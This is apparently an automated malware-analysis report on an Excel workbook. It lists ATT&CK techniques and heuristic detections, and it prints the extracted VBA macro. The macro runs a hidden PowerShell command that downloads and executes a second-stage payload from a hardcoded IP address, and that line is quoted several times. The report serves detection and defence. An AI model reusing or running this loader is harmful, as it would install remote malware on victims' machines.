MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The VBA macro within the OOXML document utilizes WScript.Shell to execute a PowerShell command. This command downloads and executes a second-stage payload from the hardcoded URL https://54.170.208.161:443/n. The use of Shell() and PowerShell references indicates a clear intent to download and run additional malicious content.
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Private Sub CheckingMac() Set WshShell = CreateObject("WScript.Shell") WshShell.Run ("powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('https://54.170.208.161:443/n'))"""), 0 -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
Set WshShell = CreateObject("WScript.Shell") WshShell.Run ("powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('https://54.170.208.161:443/n'))"""), 0 Set WshShell = Nothing -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Private Sub CheckingMac() Set WshShell = CreateObject("WScript.Shell") WshShell.Run ("powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('https://54.170.208.161:443/n'))"""), 0 -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://54.170.208.161:443/n In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 906 bytes |
SHA-256: 9ea7b236b0f3a1dca3da08f5b981e1351fdece8d18377c40d963d48ca093edaa |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Private Sub CheckingMac()
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run ("powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('https://54.170.208.161:443/n'))"""), 0
Set WshShell = Nothing
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 10752 bytes |
SHA-256: 10f7d7e4f603e094e6c08d5f6aae1b4bca544dfb234a6c49446267b9f1d005a9 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.